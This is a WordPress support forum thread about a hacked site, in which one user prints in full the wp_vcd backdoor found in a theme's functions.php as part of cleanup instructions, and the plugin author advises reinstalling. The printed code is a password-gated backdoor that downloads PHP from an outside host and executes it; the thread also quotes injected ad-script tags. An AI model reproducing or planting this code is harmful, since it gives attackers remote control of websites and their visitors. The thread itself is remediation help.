WHY

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Optimizing Matters

    (@optimizingmatters)

    6 years, 6 months ago

    well, with AO inactive (by adding ?ao_noptimize=1 to the URL) I see this in your HTML;

    <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1399564"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1399567&interactive=1&pushup=1"></script>

    no idea where (what) this is from I’m afriad @angeleyesupport.

    frank

    EricRickie

    (@ericrickie)

    6 years, 6 months ago

    I had the same problem. Here is how I solved it.

    1. Go to wp-includes foler in your wordpress directory and delete these files: wp_vcd.php,class.wp.php.

    2.At the same folder, find post.php and delete any code at the top that comes before:

    <?php
/**
 * Core Post API
 *
 * @package WordPress
 * @subpackage Post
 */

//
// Post Type Registration
//

/**
 * Creates the initial post types when 'init' action is fired.
 *
 * See {@see 'init'}.
 *
 * @since 2.9.0
 */
function create_initial_post_types() {
	register_post_type( 'post', array(
		'labels' => array.....

    3. Go to your theme’s folder location and find the function.php file. It should have the code below at the top.

    <?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f021e824fb05a9e4678d312683a585c0'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				

				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code10\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }

		                                                                    }
								}
						}
				break;

				
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}

	

if ( ! function_exists( 'theme_temp_setup' ) ) {  
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

if($tmpcontent = @file_get_contents("http://www.dolsh.com/code10.php?i=".$path))
{

function theme_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}

extract(theme_temp_setup($tmpcontent));
}
}
}

?>
    Plugin Author Optimizing Matters

    (@optimizingmatters)

    6 years, 6 months ago

    if this is the solution, then it means you were hacked @ericrickie (cfr. this technical blogpost), in which case I would advice to re-install from scratch.

    frank

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘WHY’ is closed to new replies.